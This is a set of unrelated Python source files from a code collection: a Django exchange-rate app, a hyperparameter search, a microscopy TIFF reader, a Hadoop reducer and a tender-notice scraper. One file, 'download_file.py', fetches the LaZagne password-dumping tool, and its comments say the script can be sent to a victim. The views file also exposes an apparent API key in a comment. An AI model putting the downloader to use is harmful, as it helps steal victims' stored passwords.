ax.set_title(val_1.Cur_Name)\n # for val_1 in Valuta.objects.all():\n x = []\n y = []\n for rate_1 in Valuta_kurs.objects.filter(Cur_ID=val_1.Cur_ID):\n x.append(DT.datetime(year=rate_1.Date.year, month=rate_1.Date.month, day=rate_1.Date.day))\n y.append(rate_1.Cur_OfficialRate)\n # x - Date y - Cur_OfficialRate label - Cur_Abbreviation\n ax.plot(x, y, label=val_1.Cur_Abbreviation)\n ax.legend(loc='lower right') # так же указываем положение легенды\n for label in ax.xaxis.get_ticklabels():\n # цвет подписи деленений оси OX\n label.set_color('blue')\n # поворот подписей деленений оси OX\n label.set_rotation(30)\n # размер шрифта подписей делений оси OX\n label.set_fontsize(8)\n plt.savefig('my_exrate/static/image/foo.png')\n plt.close()\n # image_data = open(\"my_exrate/static/image/foo.png\", \"rb\").read()\n else:\n return render_to_response('my_exrate/matplotlib.html', {})\n\n return render(request, 'my_exrate/matplotlib.html')\n\n\n# построить график курсов -- plotly\n# import plotly\n# plotly.tools.set_credentials_file(username='vitaly.by', api_key='T13Oh0V6SNXmdJK7rouH')\ndef plotly(request, Cur_ID):\n chartData = \"\"\n if request.user.is_authenticated:\n for val_1 in Valuta.objects.filter(Cur_ID=Cur_ID):\n x = []\n y = []\n for rate_1 in Valuta_kurs.objects.filter(Cur_ID=val_1.Cur_ID):\n x.append(DT.datetime(year=rate_1.Date.year, month=rate_1.Date.month, day=rate_1.Date.day))\n y.append(rate_1.Cur_OfficialRate)\n data = [go.Scatter(x=x, y=y)]\n py.iplot(data, filename='plotly_chart', sharing='public', auto_open=False)\n else:\n return render_to_response('my_exrate/plotly.html', {})\n return render(request, 'my_exrate/plotly.html', {'header': val_1.Cur_Name})\n\n\n# скачать файл csv\ndef csv_file(request):\n import csv\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename = \"file_rates\"'\n writer = csv.writer(response)\n writer.writerow(['First 
row', 'Foo', 'Bar', 'Baz'])\n writer.writerow(['Second row', 'A', 'B', 'C', '\"Testing\"'])\n\n return response\n\n\ndef rate_insert(request):\n kurs_USD = Valuta.objects.filter(Cur_ID=145)[0]\n Valuta_kurs.objects.bulk_create([Valuta_kurs(Cur_ID=kurs_USD,\n Cur_OfficialRate=2.1123,\n Date=now.isoformat())])\n return HttpResponse(kurs_USD)\n\n\ndef rate_select(request):\n kurs_USD2 = Valuta_kurs.objects.filter(Cur_ID=145)\n return HttpResponse(kurs_USD2)\n\n\ndef rate_delete(request):\n kurs_USD3 = Valuta_kurs.objects.filter(Cur_ID=145,\n Cur_OfficialRate=2.1123).delete()\n return HttpResponse(kurs_USD3)\n\n\ndef rate_update(request):\n kurs_USD4 = Valuta_kurs.objects.filter(Cur_ID=145,\n Cur_OfficialRate=2.1123).update(\n Cur_OfficialRate=1.9999)\n return HttpResponse(kurs_USD4)\n\n\ndef rate_by_week(request, Cur_ID):\n if request.user.is_authenticated and request.user.is_staff:\n username = request.user\n # кэширование\n # client = Client(('localhost', 11211))\n # table_rates = client.get('table_rates')\n # if table_rates is None:\n url = 'http://www.nbrb.by/API/ExRates/Rates/Dynamics/' + str(Cur_ID) + '?startDate=' + str(\n week_ago) + '&endDate=' + str(\n today)\n response = requests.get(url).json()\n # чтобы df.to_html не обрезал длинные строки до 50 символов\n pd.set_option('display.max_colwidth', -1)\n df = pd.DataFrame(response)\n str_3 = df[\"Cur_OfficialRate\"].mean()\n df = df.append({'Cur_ID': '---', 'Cur_OfficialRate': str_3, 'Date': '---'}, ignore_index=True)\n\n table_rates = df.to_html(escape=False, index=False, classes='table table-striped')\n # кэширование\n # client.set('table_rates', pickle.dumps(table_rates), expire=60)\n # else:\n # table_rates = pickle.loads(table_rates)\n\n else:\n username = 'Аноним'\n table_rates = 'Вы не зарегистрированы или не имеете прав'\n\n return render_to_response('my_exrate/rate_by_week.html',\n {'table': table_rates,\n 'user': username, 'login_form': request.user.is_authenticated})\n\n\ndef rate_by_day(request):\n if request.user.is_authenticated:\n username = request.user\n url = 'http://www.nbrb.by/API/ExRates/Rates?Periodicity=0'\n try:\n spisok_kursov = requests.get(url).json()\n # чтобы df.to_html не обрезал длинные строки до 50 символов\n pd.set_option('display.max_colwidth', -1)\n df = pd.DataFrame(spisok_kursov)\n # df.to_csv('file_rates.csv', encoding='utf-8', index=False, index_label=True)\n df1 = pd.DataFrame(columns=['amchart'])\n df2 = pd.DataFrame(columns=['matplotlib'])\n df3 = pd.DataFrame(columns=['plotly'])\n for row_k in spisok_kursov:\n str_1 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df1 = df1.append({'amchart': str_1}, ignore_index=True)\n str_2 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df2 = df2.append({'matplotlib': str_2}, ignore_index=True)\n str_3 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df3 = df3.append({'plotly': str_3}, ignore_index=True)\n if Valuta.objects.filter(Cur_ID=row_k['Cur_ID']).exists() == False:\n kurs = Valuta(Cur_ID=row_k['Cur_ID'],\n Cur_Abbreviation=row_k['Cur_Abbreviation'],\n Cur_Scale=row_k['Cur_Scale'],\n Cur_Name=row_k['Cur_Name'])\n kurs.save()\n if Valuta_kurs.objects.filter(Cur_ID_id=row_k['Cur_ID'],\n Date=row_k['Date']).exists() == False:\n val = Valuta_kurs(Cur_ID_id=row_k['Cur_ID'], Date=row_k['Date'],\n Cur_OfficialRate=row_k['Cur_OfficialRate'])\n val.save()\n df['amchart'] = df1\n df['matplotlib'] = df2\n df['plotly'] = df3\n if request.LANGUAGE_CODE == 'ru':\n table_rates = df.to_html(escape=False, index=False, classes=\"table table-striped\",\n 
\n\n\ndef rate_by_day(request):\n if request.user.is_authenticated:\n username = request.user\n url = 'http://www.nbrb.by/API/ExRates/Rates?Periodicity=0'\n try:\n spisok_kursov = requests.get(url).json()\n # so that df.to_html does not truncate long strings at 50 characters\n pd.set_option('display.max_colwidth', -1)\n df = pd.DataFrame(spisok_kursov)\n # df.to_csv('file_rates.csv', encoding='utf-8', index=False, index_label=True)\n df1 = pd.DataFrame(columns=['amchart'])\n df2 = pd.DataFrame(columns=['matplotlib'])\n df3 = pd.DataFrame(columns=['plotly'])\n for row_k in spisok_kursov:\n str_1 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df1 = df1.append({'amchart': str_1}, ignore_index=True)\n str_2 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df2 = df2.append({'matplotlib': str_2}, ignore_index=True)\n str_3 = '' + str(\n row_k['Cur_Abbreviation']) + ''\n df3 = df3.append({'plotly': str_3}, ignore_index=True)\n if not Valuta.objects.filter(Cur_ID=row_k['Cur_ID']).exists():\n kurs = Valuta(Cur_ID=row_k['Cur_ID'],\n Cur_Abbreviation=row_k['Cur_Abbreviation'],\n Cur_Scale=row_k['Cur_Scale'],\n Cur_Name=row_k['Cur_Name'])\n kurs.save()\n if not Valuta_kurs.objects.filter(Cur_ID_id=row_k['Cur_ID'],\n Date=row_k['Date']).exists():\n val = Valuta_kurs(Cur_ID_id=row_k['Cur_ID'], Date=row_k['Date'],\n Cur_OfficialRate=row_k['Cur_OfficialRate'])\n val.save()\n df['amchart'] = df1\n df['matplotlib'] = df2\n df['plotly'] = df3\n if request.LANGUAGE_CODE == 'ru':\n table_rates = df.to_html(escape=False, index=False, classes=\"table table-striped\",\n columns=['Cur_ID', 'Cur_Abbreviation', 'Cur_Name', 'Cur_OfficialRate',\n 'Cur_Scale',\n 'amchart', 'matplotlib', 'plotly'])\n else:\n table_rates = df.to_html(escape=False, index=False, classes=\"table table-striped\",\n columns=['Cur_ID', 'Cur_Abbreviation', 'Cur_OfficialRate',\n 'Cur_Scale',\n 'amchart', 'matplotlib', 'plotly'])\n except Exception:\n table_rates = 'Cur_ID Cur_Abbreviation Cur_Name Cur_OfficialRate Cur_Scale amchart matplotlib plotly'\n else:\n username = 'Аноним'\n table_rates = 'Вы не зарегистрированы или не имеете прав'\n\n return render_to_response('my_exrate/rate_by_day.html',\n {'table': table_rates,\n 'user': username, 'login_form': request.user.is_authenticated})\n\n\ndef questions(request):\n latest_question_list = Question.objects.order_by('id')[:5]\n context = {'latest_question_list': latest_question_list}\n return render(request, 'my_exrate/index.html', context)\n\n\ndef results(request, question_id):\n response = \"You're looking at the results of question %s.\"\n return HttpResponse(response % question_id)\n\n\ndef vote(request, question_id):\n return HttpResponse(\"You're voting on question %s.\" % question_id)\n\n\ndef detail(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'my_exrate/detail.html', {'question': question})\n\n\ndef test_fn1(ls, divisor):\n result = []\n idx = 0\n while idx < len(ls):\n result.append(ls[idx] / divisor)\n idx = idx + 1\n return result\n\n\ndef lang_change(request, lang_code):\n translation.activate(lang_code)\n request.session[LANGUAGE_SESSION_KEY] = lang_code\n my_string = _(\"Главная\")\n print(my_string)\n # return render(request, 'my_exrate/index.html')\n return HttpResponseRedirect('/')\n\n\ndef server_upd(request):\n if request.POST.get('Cur_ID') is None or request.POST.get('Date') is None or request.POST.get(\n 'Cur_OfficialRate') is None:\n status_upd = 'No input data'\n else:\n kurs_upd = Valuta_kurs.objects.filter(Cur_ID=request.POST.get('Cur_ID'),\n Date=request.POST.get('Date')).update(\n Cur_OfficialRate=request.POST.get('Cur_OfficialRate'))\n status_upd = 'OK'\n print(str(kurs_upd))\n print(status_upd)\n\n return JsonResponse({'status': status_upd})\n","sub_path":"my_exrate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"33779407","text":"\n# coding: utf-8\n\n# In[6]:\n\nfrom __future__ import division\nimport pysmac\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.metrics import roc_curve, roc_auc_score\nimport matplotlib.pyplot as plt\n\n\n# In[7]:\n\n#reading data files\nx_train = pd.read_csv('../input/data100/train.csv', header=None, dtype=np.float32)\ny_train=pd.read_csv('../input/data100/y_train.csv', header=None, dtype=np.int32).values.ravel()\nx_valid=pd.read_csv('../input/data100/valid.csv', header=None, dtype=np.float32)\ny_valid=pd.read_csv('../input/data100/y_valid.csv', header=None, dtype=np.int32).values.ravel()\n\n\n# In[8]:\n\ndef choose_classifier(classifier, # which classifier to use\n trees_n_estimators = None, trees_criterion = None, \n trees_max_features = None, trees_max_depth = None,\n trees_min_samples_split = None\n ):\n\n if classifier == 'random_forest':\n # keyword arguments: passing these positionally would silently map\n # trees_max_features onto min_samples_leaf in sklearn's signature\n predictor = RandomForestClassifier(n_estimators=trees_n_estimators,\n criterion=trees_criterion,\n max_depth=trees_max_depth,\n min_samples_split=trees_min_samples_split,\n max_features=trees_max_features,\n )\n elif classifier == 'extra_trees':\n predictor = ExtraTreesClassifier(n_estimators=trees_n_estimators,\n criterion=trees_criterion,\n max_depth=trees_max_depth,\n min_samples_split=trees_min_samples_split,\n max_features=trees_max_features,\n )\n \n predictor.fit(x_train, y_train)\n y_predictions = predictor.predict(x_valid)\n \n return 1-roc_auc_score(y_valid, y_predictions)
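\n\n\n# In[ ]:\n\n# A hedged sanity check (not in the original notebook): call the objective once with the\n# defaults declared in parameter_definition below, so configuration errors surface before the\n# 50-evaluation SMAC run. The literal values mirror those defaults.\nerr = choose_classifier('random_forest', trees_n_estimators=75, trees_criterion='entropy',\n trees_max_features=0.1, trees_max_depth=10, trees_min_samples_split=2)\nprint('1-AUC with default parameters: %f' % err)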
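\n\n# A hedged illustration with made-up shapes (not part of the original script): ScanImage\n# interleaves channels and planes along the first axis, so the frames belonging to channel ch\n# are recovered with the strided slice stack[ch::frames_per_vol] used in the class below.\ndef _demo_interleaved_slicing():\n n_channels, n_planes = 2, 6\n frames_per_vol = n_channels * n_planes\n stack = np.arange(4 * frames_per_vol) # stands in for 4 volumes' worth of frame indices\n print(stack[0::frames_per_vol]) # channel 0 frames: [ 0 12 24 36]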
\n\ndef adjust_lookup(ch_mean, min, max):\n ch_mean[ch_mean < min] = min\n ch_mean[ch_mean > max] = max\n return ch_mean
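\n\n# A hedged usage example for adjust_lookup (illustrative values only): it clamps pixel values\n# into a display window, the same idea as a brightness/contrast lookup adjustment.\ndef _demo_adjust_lookup():\n sample = np.array([0., 50., 200., 4000.])\n print(adjust_lookup(sample, 100, 1000)) # -> [ 100. 100. 200. 1000.]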
\n\n\n# In[ ]:\n\n# defining all the parameters with respective defaults.\nparameter_definition=dict( trees_n_estimators=('integer', [10,150], 75),\n trees_criterion =('categorical', ['gini', 'entropy'], 'entropy'),\n trees_max_features=('real', [0.0,1.0], 0.1),\n trees_max_depth = ('integer', [5,40], 10),\n trees_min_samples_split = ('integer', [1,10], 2),\n classifier = ('categorical', ['random_forest','extra_trees'], 'random_forest'),\n )\n\n\n# In[ ]:\n\n# creation of the SMAC_optimizer object.\nopt = pysmac.SMAC_optimizer( debug = 0,\n working_directory = '/tmp/pySMAC_test/', persistent_files=True, )\n\n\n# Using the minimize method\nvalue, parameters = opt.minimize(choose_classifier,\n max_evaluations=50,\n parameter_dict=parameter_definition)\n\nprint('The lowest error (1-AUC) found: %f'%(value))\nprint('Parameter setting %s'%parameters)\n","sub_path":"homesite/pySMAC_RF_ET.py","file_name":"pySMAC_RF_ET.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"88589174","text":"from ScanImageTiffReader import ScanImageTiffReader\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport json\n\nch_num = {\n 'green': 0,\n 'red': 1,\n 'blue': 2\n}\n\n# #hate this\n# class Channel(Image):\n#\n# def __init__(self, color):\n# self.color = color\n# super().__init__()\n#\n# def get_channel_means(self):\n# # calculate many frames are in a volume\n# n_channels = 2 # meta['SI.hChannels.channelsAvailable']\n# n_planes = 6 # meta['SI.hFastZ.numFramesPerVolume']\n# frames_per_vol = n_planes * n_channels\n# self.ch_mean = np.nanmean(self.tiff[ch_num[self.color]:len(self.tiff):frames_per_vol,:,:],axis=0)\n#\n# def adjust_lookup(self, min, max):\n# self.ch_mean[self.ch_mean < min] = min\n# self.ch_mean[self.ch_mean > max] = max\n\n\n# WORKING ON THIS TO GET META-DATA PULLED AND STORED\n# ALSO HAVE PICKLE FILE SAVED\ndef read_meta(file):\n with ScanImageTiffReader(file) as reader:\n meta = reader.metadata()\n print('metadata retrieved!')\n\n # parse the fields we need out of the raw metadata string\n metadata = {\n 'planes': len(meta.split('hFastZ.userZs = [')[1].split(']')[0].split(' ')),\n 'nchannels': len(meta.split('channelSave = [')[1].split(']')[0].split(';')),\n 'f_rate': float(meta.split('scanVolumeRate = ')[1].split(r'\\n')[0])\n }\n\n return metadata\n\ndef read_tiff(file):\n reader = ScanImageTiffReader(file)\n raw_tiff = reader.data()\n print('.tiff read in successfully!')\n return raw_tiff
\n\nclass Image:\n \"\"\"Init with red and green channels available.\"\"\"\n\n def __init__(self, file, wavelength, channels):\n self.wavelength = wavelength\n self.file = file\n self.channels = channels\n\n def read_ave_tiff(self,file):\n\n # read in tiff\n raw_tiff = read_tiff(file)\n\n # calculate how many frames are in a volume\n n_channels = 2 # meta['SI.hChannels.channelsAvailable']\n n_planes = 6 # meta['SI.hFastZ.numFramesPerVolume']\n frames_per_vol = n_planes * n_channels\n\n # calculate the mean image per channel with a strided slice over the interleaved stack\n self.mean_tiff = []\n for ch in range(n_channels):\n self.mean_tiff.append(np.nanmean(raw_tiff[ch:len(raw_tiff):frames_per_vol,:,:],axis=0))\n\n ### and then make rgb (????)\n ### nah cause I want to do adjust lookup on it\n\n def make_rgb(self, min, max):\n\n\n # make an empty numpy array for the image\n rgb_im = np.zeros((512,512,3))\n\n # loop over mean_tiff's channels, adjust the lookups, and normalise each into [0, 1]\n for i,ch in enumerate(self.mean_tiff):\n adjust_lookup(self.mean_tiff[i], min, max)\n self.mean_tiff[i] -= self.mean_tiff[i].min()\n rgb_im[:,:,i] = self.mean_tiff[i]/self.mean_tiff[i].max()\n\n plt.imshow(rgb_im)\n\n\n # self.green_ch_mean = np.nanmean(self.raw_tiff[0:len(self.raw_tiff[0]):frames_per_vol,:,:],axis=0)\n # self.red_ch_mean = np.nanmean(self.raw_tiff[1:len(self.raw_tiff[1]):frames_per_vol,:,:],axis=0)\n\n # return a list that contains the average tiff channels\n # self.mean_image = [self.green_ch_mean,self.red_ch_mean]\n\n\n # def mean_image(self, colors):\n # ch1 = Channel(colors[0])\n # ch2 = Channel(colors[1])\n # self.mean_image = [ch1.get_channel_means(), ch2.get_channel_means()]\n #\n\n\n\n\nfrom tiffs import *\nimport glob\ng = glob.glob('/Users/willh/Google Drive/Code/*')\n# assign one path to file and try the tiff functions\nfile = g[1]\n\n#files = []\n#for file,i in enumerate(g):\n# files[i] = file\n\nwavelength = '920'\nchannels = ['green', 'red']\nimage = Image(file,wavelength,channels)\nimage.read_ave_tiff(file)\n# Channel and mean_image are still commented out above, so these calls stay disabled:\n# print(ch1.color)\n# image.mean_image(channels)\n","sub_path":"python/tiffs.py","file_name":"tiffs.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"506073667","text":"#!/usr/bin/env python\nimport requests #library that allows sending requests over the internet.\n\ndef download(url):\n get_response=requests.get(url) #create the get_response object by calling the requests module's get function.\n #print(get_response) #will display only the response code (200, 300, 301 etc).\n #print(get_response.content) #content will display the actual binary output.\n get_name= url.split(\"/\")[-1] #split breaks the url into a list of parts.\n # Here we split it based on the \"/\".\n # [-1] is used to select the last item in the list, which is the name of the file.\n with open(get_name,\"wb\",) as outputfile: #with is used to manage the file handle; the file is opened in binary write mode.\n #any name can be given to the file. we use the split to automate the task and\n # thus assign the appropriate file type. the file will be stored in the directory in which the program is being executed.\n # outputfile is the reference object that can be used in the program.\n outputfile.write(get_response.content) #write writes the argument passed to it into the file.\n\ndownload(\"https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip\") #any file to be downloaded can be given as the url.\n\n#LaZagne is a malware file that sniffs all the passwords stored in the computer system\n#Lazagne is available for all operating systems. 
Here i have used the windows version.\n\n#comment:\n#This code can be sent to the victim and when he executes this the file wil be downloaded automatically.\n","sub_path":"malwares/download_file.py","file_name":"download_file.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"468242564","text":"#!/usr/bin/env python\n\nimport sys\n\nif __name__ == '__main__':\n n=0\n for line in sys.stdin:\n\n col1,letra,fecha,valor1 = line.split(\"\\t\")\n col2=int(valor1)\n if n < 6: \n sys.stdout.write(\"{} {} {}\\n\".format(letra,fecha,col2))\n n=n+1\n","sub_path":"01-hadoop-50/q09-10/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307717386","text":"import requests\nfrom bs4 import BeautifulSoup\nimport random\nimport pandas as pd\nimport re\nimport time\n\n# 头文字,模仿浏览器,以防屏蔽IP\nheaders_one = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"\n \" AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\"\n}\nheaders_two = {\n 'user-agent': \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\"\n}\nheaders_three = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'\n}\nheaders_list = [headers_one, headers_two, headers_three]\n\n# 定义 第一个页面的数据 的变量\nname_list = [] # 项目名称\nlink_list = [] # 项目连链接\ndate_p_list = [] # 项目刊登日期\n\n# t(tender)代表招标 、 w(winning bid)代表中标\nw_f_name_bidder_list = [] # 第一中标候选人\nw_s_name_bidder_list = [] # 第二中标候选人\nw_t_name_bidder_list = [] # 第三中标候选人\nw_price_list = [] # 中标价\nt_name_list = [] # 项目招标人\nt_num_list = [] # 项目招标编号\nt_depa_list = [] # 招标代理机构\nBRN_list = [] # 工商注册号\nproposed_bidder = [] # 拟中标人\naccept_com_depa_list = [] # 投诉受理部门\nw_s_price_list = [] # 第二中标人价格\nw_t_price_list = [] # 第三中标人价格\n\nlist_c_dict = {\n 1: w_f_name_bidder_list, 2: w_s_name_bidder_list, 3: w_t_name_bidder_list,\n 4: w_price_list, 5: t_name_list, 6: t_num_list, 7: t_depa_list, 8: BRN_list, 9: proposed_bidder,\n 10: accept_com_depa_list, 11: w_s_price_list, 12: w_t_price_list\n}\n\n\ndef parse_outer_page():\n domain = \"https://www.cqggzy.com\"\n start_url = (\"http://www.cqggzy.com/web/services/PortalsWebservice/getInfoList?response=application/\"\n \"json&pageIndex=15583&pageSize=1\" # 爬的两天,网站上传了两次新数据,在这里修改。\n \"&siteguid=d7878853-1c74-4913-ab15-1d72b70ff5e7&categorynum=005002001&title=\"\n \"&infoC=&_=1548761616465\")\n response = requests.get(start_url, headers=headers_list[random.randint(0, 2)], verify=False)\n\n # 将返回的JSON数据 转换为 列表\n response_items_list = eval(response.json().get(\"return\"))\n\n # 获取 项目名称、项目链接、项目刊登日期 数据\n for item in response_items_list:\n name_list.append(item.get(\"title\"))\n link_list.append(domain + item.get(\"infourl\"))\n date_p_list.append(item.get(\"infodate\"))\n\n\ndef parse_inner_page():\n count = 0\n for item in link_list:\n\n # 在控制台显示次数\n count = count + 1\n w_f_price_tmp = []\n w_s_price_tmp = []\n w_t_price_tmp = []\n accept_com_depa_tmp = []\n proposed_bidder_tmp = []\n BRN_tmp = []\n t_num_tmp = []\n t_name_tmp = []\n w_price_tmp = []\n w_f_name_bidder_tmp = []\n w_s_name_bidder_tmp = []\n w_t_name_bidder_tmp = []\n t_depa_tmp = []\n\n list_c_dict_tmp = {\n 1: w_f_name_bidder_tmp, 2: w_s_name_bidder_tmp, 3: w_t_name_bidder_tmp,\n 4: w_price_tmp, 5: t_name_tmp, 6: t_num_tmp, 7: t_depa_tmp, 8: BRN_tmp, 9: 
proposed_bidder_tmp,\n 10: accept_com_depa_tmp, 11: w_s_price_tmp, 12: w_t_price_tmp, 13: w_f_price_tmp\n }\n response = requests.get(item, headers=headers_list[random.randint(0, 2)])\n print(response)\n print(count)\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n s = BeautifulSoup(response.text, \"html5lib\")\n\n if len(s.find_all(name=\"tbody\")) != 0:\n trs = s.find_all(name=\"tbody\")[0].find_all(\"tr\")\n list_c_dict_tmp = crawl_data(trs)\n\n # 整合\n for nc in range(1, 13):\n list_c_dict[nc].append(list_c_dict_tmp[nc])\n\n # 测试\n # for i in range(1, 13):\n # print(len(list_c_dict[i]))\n\n\ndef crawl_data(trs):\n # 初始化数据\n w_f_price_tmp = []\n w_s_price_tmp = []\n w_t_price_tmp = []\n accept_com_depa_tmp = []\n proposed_bidder_tmp = []\n BRN_tmp = []\n t_num_tmp = []\n t_name_tmp = []\n w_price_tmp = []\n w_f_name_bidder_tmp = []\n w_s_name_bidder_tmp = []\n w_t_name_bidder_tmp = []\n t_depa_tmp = []\n\n list_c_dict_tmp = {\n 1: w_f_name_bidder_tmp, 2: w_s_name_bidder_tmp, 3: w_t_name_bidder_tmp,\n 4: w_price_tmp, 5: t_name_tmp, 6: t_num_tmp, 7: t_depa_tmp, 8: BRN_tmp, 9: proposed_bidder_tmp,\n 10: accept_com_depa_tmp, 11: w_s_price_tmp, 12: w_t_price_tmp, 13: w_s_price_tmp\n }\n for tr in trs:\n ps = tr.find_all(\"p\")\n if not ps:\n tds = tr.find_all(\"td\")\n count = -1\n for td in tds:\n count = count + 1\n print(td.get_text())\n tmp = re.sub(r\"\\s+[::\\\"“”\\']\", \"\", td.get_text())\n # 属性class=B的标签里找第一、二、三中标候选人及价格\n td_tmp = td.find_all(attrs={\"class\": \"B\"})\n print(tmp)\n if tmp != '':\n if tmp == \"工程编码\":\n t_num_tmp.append(tds[1].get_text())\n elif tmp == \"标段编号\":\n t_num_tmp.append(tds[1].get_text())\n elif tmp == \"填报人\": # 理解为招标人\n t_name_tmp.append(tds[1].get_text())\n elif tmp == \"项目法人\":\n t_name_tmp.append(tds[1].get_text())\n elif tmp == \"填报单位\": # 理解为招标代理机构\n t_depa_tmp.append(tds[1].get_text())\n elif tmp == \"招标代理机构\":\n t_depa_tmp.append(tds[1].get_text())\n elif len(td_tmp) > 15:\n for i in range(0, len(td_tmp)):\n # 第一中标候选人及价格\n if td_tmp[i].get_text() == \"1\":\n w_f_name_bidder_tmp.append(td_tmp[i + 1].get_text())\n w_price_tmp.append(td_tmp[i + 2].get_text())\n # 第二中标候选人及价格\n if td_tmp[i].get_text() == \"2\":\n w_s_name_bidder_tmp.append(td_tmp[i + 1].get_text())\n w_s_price_tmp.append(td_tmp[i + 2].get_text())\n # 第三中标候选人及价格\n if td_tmp[i].get_text() == \"3\":\n w_t_name_bidder_tmp.append(td_tmp[i + 1].get_text())\n w_t_price_tmp.append(td_tmp[i + 2].get_text())\n\n elif td.get_text() == \"第一中标(选)候选人\":\n w_f_name_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"第二中标(选)候选人\":\n w_s_name_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"第三中标(选)候选人\":\n w_t_name_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"中标(选)人\":\n proposed_bidder_tmp.append(tds[count + 1].get_text())\n elif td.get_text() == \"中标(选)价(万元)\":\n w_price_tmp.append(tds[count + 1].get_text())\n\n else:\n # 记录有多少个item(进行了多少次循环)用于最后判断 本页面 抓取数据 是否完成\n # count = count + 1\n # 抓取数据\n if ps and (len(ps) > 1):\n tmp = re.sub(r\"\\s+\", \"\", ps[0].get_text().strip())\n\n # print(ps)\n # print(len(ps))\n # print(tmp)\n\n # 招标编码、招标人(填报人)、招标代理机构\n if tmp == \"招标公告编号\":\n t_num_tmp.append(ps[1].get_text().strip())\n elif tmp == \"招标编码\":\n t_num_tmp.append(ps[1].get_text().strip())\n elif tmp == \"招标人\":\n if ps[1].get_text() == \"单位名称\":\n t_name_tmp.append(ps[2].get_text().strip())\n else:\n t_name_tmp.append(ps[1].get_text().strip())\n elif tmp == \"填报人\":\n t_name_tmp.append(ps[1].get_text().strip())\n elif 
tmp == \"招标代理机构\":\n t_depa_tmp.append(ps[1].get_text().strip())\n\n # 第二中标人 及 价格\n elif tmp == \"第二中标候选人\":\n w_s_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_s_price_tmp.append(spider_price(ps))\n elif tmp == \"第二中标(选)候选人\":\n w_s_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_s_price_tmp.append(spider_price(ps))\n\n # 第三中标人 及 价格\n elif tmp == \"第三中标候选人\":\n w_t_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_t_price_tmp.append(spider_price(ps))\n elif tmp == \"第三中标(选)候选人\":\n w_t_name_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_t_price_tmp.append(spider_price(ps))\n\n # 中标人、拟中标人、中标(选)人\n elif tmp == \"中标人\":\n proposed_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_price_tmp.append(spider_price(ps))\n # print()\n elif tmp == \"中标(选)人\":\n proposed_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n w_price_tmp.append(spider_price(ps))\n elif tmp == \"拟中标人\":\n proposed_bidder_tmp.append(ps[1].get_text().strip())\n if len(ps) > 3:\n # print(2)\n w_price_tmp.append(spider_price(ps))\n\n # 中标人、拟中标人、中标(选)人 的 中标金额\n elif tmp == \"中标金额(万元)\":\n w_price_tmp.append(ps[1].get_text().strip())\n elif tmp == \"中标金额(元)\":\n w_price_tmp.append(ps[1].get_text().strip())\n elif tmp == \"中标(选)价(元)\":\n w_price_tmp.append(ps[1].get_text().strip())\n elif tmp == \"中标价\":\n w_price_tmp.append(ps[1].get_text().strip())\n\n # 工商注册号、投诉受理部门\n elif tmp == \"工商注册号\":\n BRN_tmp.append(ps[1].get_text().strip())\n # print(ps[1].get_text())\n elif tmp == \"投诉受理部门\":\n accept_com_depa_tmp.append(ps[1].get_text().strip())\n\n # 第一中标候选人 及 价格\n elif len(ps) > 4:\n for i in range(0, len(ps)):\n if ps[i].get_text() == \"第一中标候选人\":\n if i + 2 <= len(ps):\n w_f_name_bidder_tmp.append(ps[i + 1].get_text().strip())\n # print(len(ps))\n # print(i)\n if i + 4 <= len(ps):\n w_f_price_tmp.append(ps[i + 3].get_text().strip())\n # print(ps[i + 3].get_text())\n elif len(ps) > 4:\n for i in range(0, len(ps)):\n if ps[i].get_text() == \"第一中标(选)候选人\":\n w_f_name_bidder_tmp.append(ps[i + 1].get_text().strip())\n if i + 4 <= len(ps):\n w_f_price_tmp.append(ps[i + 2].get_text().strip())\n return list_c_dict_tmp\n\n\ndef spider_price(ps):\n \"\"\"\n There is code duplication when crawling prices\n Param ps\n Return: price\n \"\"\"\n # 去除所有空格\n ps_tmp = re.sub(r\"\\s+\", \"\", ps[2].get_text().strip())\n ps_tmp_t = re.sub(r\"\\s+\", \"\", ps[3].get_text().strip())\n # print(ps_tmp)\n # print(ps_tmp_t)\n # 关于括号的全角 和 半角 的不同情况 应该有更好的解决办法吧!!\n if ps_tmp == \"中标金额(万元)\":\n return ps[3].get_text()\n elif ps_tmp == 